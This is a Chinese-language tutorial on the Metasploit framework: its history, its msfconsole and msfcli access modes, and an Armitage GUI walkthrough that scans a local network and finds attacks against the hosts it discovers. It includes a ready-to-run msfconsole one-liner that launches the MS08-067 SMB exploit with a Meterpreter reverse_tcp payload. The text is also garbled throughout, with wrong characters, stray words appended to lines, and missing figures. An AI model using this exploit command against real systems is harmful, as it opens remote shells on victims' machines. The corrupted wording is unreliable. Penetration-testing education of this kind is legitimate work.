Metasploit是一款开源的安全漏洞检测工具。
它能够帮助用户识别安全问题,验证漏洞的缓解措施,并对某些软件进行安全性评估,提供真正的安全风险情报。当咱们第一次接触Metasploit渗透测试框架软件(MSF)时,可能会被它提供如此多的接口、选项、变量和模块所震撼,而感受无所适从。Metasploit软件为它的基础功能提供了多个用户接口,包括终端、命令行和图形化界面等。sql
2003年,HD Moore开发了开源项目Metasploit。
2007年,Metasploit使用Ruby重构,本来用的是Perl。
2009年,Rapid7买下了它,这是一家生产了漏洞扫描器Nexpose的信息安全公司。
Metasploit当前版本是4.9.3,Kali Linux默认安装。BackTrack里也有。若是大家使用其它版本的Linux或者Unix(包括Mac OS),能够去Rapid7官网下载。
Windows使用者也能够从Rapid7获取Windows版本,不过不建议在Windows上使用Metasploit。由于虽然能够下载安装,可是有些攻击框架的功能没能移植到Windows上,并且在Null Byte这里的不少攻击方式也无法工做在Windows上。shell
有几种方式能够访问Metasploit。最一般的方式,也是我使用的方式,是经过Metasploit交互控制台。在Kali的命令行中输入msfconsole便可使用。如下是其它的方式:数据库
首先,咱们能够从命令行使用Metasploit,即msfcli模式。看起来咱们只是在控制台下使用命令行,实际上咱们正使用着一个有特殊关键字和命令支持的交互对话框。经过msfcli,咱们是真的在使用Linux命令行。
咱们能够经过如下命令进入帮助页面:
kali > msfcli -h
但在新版metasploit中Msfcli再也不有效,做为取代,咱们能够在* Msfconsole 使用 -x 选项*。
好比说:windows
root@kali:~# msfconsole -x "use exploit/windows/smb/ms08_067_netapi; set RHOST [192.168.128.1]; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST [192.168.128.128]; run"
这样就能够直接使用啦!可是这种方式只能用单条指令(shell),执行一些复杂的漏洞攻击程序(exploits)就不太可能了。
这一部分与平时实验重叠。api
Armitage组件是Metasploit框架中一个彻底交互式的图形化用户接口,由Raphael Mudge所开发。Armitage工具包含Metasploit控制台,经过使用其标签特性,用户能够看到多个Metasploit控制台或多个Meterpreter会话。
Armitage是基于C/S架构的Metasploit图形界面。启动Metasploit做为服务端,Armitage做为客户端,咱们就有了一个可使用Metasploit完整功能的完整——但不是彻底直观——图形界面。安全
想经过图形界面使用Metasploit,那么咱们有好几个选择。
1.在Kali启动Armitage,简单键入:
kali > armitage
如图Armitage:
网络
2.若是Armitage链接失败,尝试如下替代命令:
kali > service start postgresql
kali > service start metasploit
kali > service stop metasploit
图Armitage1:
架构
3.固然咱们也能够直接通过这种方式。。。
如图另外一种方式:
框架
可是在使用Armitage工具前,必须将Metasploit服务启动!不然,没法运行Armitage工具。由于Armitage须要链接到Metasploit服务,才能够启动。在Kali桌面依次选择“应用程序”|Kali Linux|“系统服务”|Metasploit|community/pro start命令启动Metasploit服务,
图metasploit:
tcp
或者直接在命令行输入msfconsole
图msfconsole:
将输出以下所示的信息:
[ ok ] Starting PostgreSQL 9.1 database server: main. Configuring Metasploit… Creating metasploit database user 'msf3'… Creating metasploit database 'msf3'… insserv: warning: current start runlevel(s) (empty) of script `metasploit' overrides LSB defaults (2 3 4 5). insserv: warning: current stop runlevel(s) (0 1 2 3 4 5 6) of script `metasploit' overrides LSB defaults (0 1 6).
从输出的信息中能够看到++PostgreSQL 9.1++数据库服务已启动,并建立了数据库用户和数据库。
咱们跟进一下链接界面,
图链接界面:
该界面显示了链接Metasploit的一个进度。当成功链接到Metasploit服务的话,将显示以下图所示的界面。
图:
该界面共有三个部分,这里把它们分别标记为A、B和C 。下面分别介绍这三部分。
1)A:这部分显示的是预配置模块。用户能够在模块列表中使用空格键搜索提供的模块。
2)B:这部分显示活跃的目标系统,用户能执行利用漏洞攻击。
3)C:这部分显示多个Metasploit标签。这样,就能够运行多个Meterpreter命令或控制台会话,而且同时显示。
咱们如今就拿Armitage作个实例。
(1)启动Armitage工具,界面如以前所示。从该界面能够看到默认没有扫描到任何主机。这里经过扫描,找到本网络中的全部主机。
(2)在Armitage工具的菜单栏中依次选择Hosts|Nmap Scan|Quick Scan命令。
(3)在该界面输入要扫描的网络范围,这里输入的网络范围是192.168.41.0/24。而后单击“肯定”按钮,将开始扫描。扫描完成后,将显示以下图所示的界面。
图输入IP:
(4)从该界面能够看到,弹出了一个扫描完成对话框,此时单击“肯定”按钮便可。而且在目标系统的窗口中,显示了三台主机。这三台主机就是扫描到的主机。从扫描完成的对话框中能够看到提示建议选择Attacks|Find Attacks命令,将能够渗透攻击目标系统
(5)在菜单栏中依次选择Attacks|Find Attacks命令,运行完后将显示如图所示的界面。
图attacks:
(6)从该界面能够看到攻击分析完成,而且右击扫描到的主机将会看到有一个Attack菜单
图显示attacks:
(7)从该界面能够看到在目标主机的菜单中出现了Attack选项,在该菜单中共有五个选项。在没有运行Find Attacks命令前,只要Services、Scan和Host三个选项。这里扫描到的主机屏幕都是黑色,这是由于尚未识别出操做系统的类型。此时能够在菜单栏中依次选择Hosts|Nmap Scan|Quick Scan(OS detect)命令,扫描操做系统类型。扫描完成后,将显示操做系统的默认图标。
(8)扫描操做系统。扫描完成后,将显示下图所示的界面
图操做系统: